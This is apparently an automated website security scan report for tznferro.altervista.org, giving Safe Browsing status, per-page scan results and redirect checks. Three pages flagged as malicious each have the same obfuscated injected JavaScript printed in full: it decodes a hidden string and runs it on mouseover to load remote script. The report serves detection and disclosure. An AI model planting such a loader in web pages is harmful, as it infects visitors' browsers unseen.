Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tznferro.altervista.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tznferro.altervista.org/ | 200 OK Content-Length: 7086 Content-Type: text/html | clean |
http://s10.histats.com/js9.js | 200 OK Content-Length: 7417 Content-Type: text/javascript | clean |
http://tznferro.altervista.org/index2_NEW.htm | 200 OK Content-Length: 21948 Content-Type: text/html | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://tznferro.altervista.org/news_.html | 200 OK Content-Length: 2972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Dhis%0Ay3z%0Dow6%0A28iiremf6ufrwoh%3Di75d2waovhic6x5uyatmqafeut0nxfltv5u.8gpchsxratyeldyair4t3ozep6eEz50lp7zeyusmfb3e4a8n1jjtgzp%28a8h%22a2viqenfetvrgpyait5m6x8eqt3%22x09%2971q%3Bk5x%0D3jf%0Atsfi8zhfl6gr5fb.vuosux8rq5jcya4%3Drjg%228v7hqfjtvymtxgppkao%3A2pp/koo/fodpv4dr881ifkwmqraa0x1bj8bi4ens5vvcewwouxjtvkuexer.mp5ipa8ni4x/5haifo8nx2g.qj7ci6kgj97iciv%3F171d3w8ec38fs88auhs for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://tznferro.altervista.org/test404page.js | 404 Not Found Content-Length: 2965 Content-Type: text/html | clean |
http://tznferro.altervista.org/tznintv_.htm | 200 OK Content-Length: 832 Content-Type: text/html | clean |
http://tznferro.altervista.org/111_.html | 200 OK Content-Length: 2938 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Dhis%0Ay3z%0Dow6%0A28iiremf6ufrwoh%3Di75d2waovhic6x5uyatmqafeut0nxfltv5u.8gpchsxratyeldyair4t3ozep6eEz50lp7zeyusmfb3e4a8n1jjtgzp%28a8h%22a2viqenfetvrgpyait5m6x8eqt3%22x09%2971q%3Bk5x%0D3jf%0Atsfi8zhfl6gr5fb.vuosux8rq5jcya4%3Drjg%228v7hqfjtvymtxgppkao%3A2pp/koo/fodpv4dr881ifkwmqraa0x1bj8bi4ens5vvcewwouxjtvkuexer.mp5ipa8ni4x/5haifo8nx2g.qj7ci6kgj97iciv%3F171d3w8ec38fs88auhs for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://tznferro.altervista.org/bio_.html | 200 OK Content-Length: 834 Content-Type: text/html | clean |
http://tznferro.altervista.org/disco_.html | 200 OK Content-Length: 836 Content-Type: text/html | clean |
http://tznferro.altervista.org/testi_.html | 200 OK Content-Length: 830 Content-Type: text/html | clean |
http://tznferro.altervista.org/interviste_.html | 200 OK Content-Length: 2981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Dhis%0Ay3z%0Dow6%0A28iiremf6ufrwoh%3Di75d2waovhic6x5uyatmqafeut0nxfltv5u.8gpchsxratyeldyair4t3ozep6eEz50lp7zeyusmfb3e4a8n1jjtgzp%28a8h%22a2viqenfetvrgpyait5m6x8eqt3%22x09%2971q%3Bk5x%0D3jf%0Atsfi8zhfl6gr5fb.vuosux8rq5jcya4%3Drjg%228v7hqfjtvymtxgppkao%3A2pp/koo/fodpv4dr881ifkwmqraa0x1bj8bi4ens5vvcewwouxjtvkuexer.mp5ipa8ni4x/5haifo8nx2g.qj7ci6kgj97iciv%3F171d3w8ec38fs88auhs for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://tznferro.altervista.org/foto_.html | 200 OK Content-Length: 845 Content-Type: text/html | clean |
http://tznferro.altervista.org/media_.htm | 200 OK Content-Length: 836 Content-Type: text/html | clean |
http://tznferro.altervista.org/dic_.html | 200 OK Content-Length: 830 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tznferro.altervista.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 13:01:52 GMT
Accept-Ranges: bytes
ETag: "107210b-1bae-4b65a59dfe580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 7086
Content-Type: text/html
Last-Modified: Thu, 12 Jan 2012 20:11:18 GMT
...7086 bytes of data.
GET / HTTP/1.1
Host: tznferro.altervista.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 13:01:52 GMT
Accept-Ranges: bytes
ETag: "107210b-1bae-4b65a59dfe580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 7086
Content-Type: text/html
Last-Modified: Thu, 12 Jan 2012 20:11:18 GMT
...7086 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tznferro.altervista.org
Referer: http://www.google.com/search?q=tznferro.altervista.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tznferro.altervista.org
Referer: http://www.google.com/search?q=tznferro.altervista.org
Result:
The result is similar to the first query. There are no suspicious redirects found.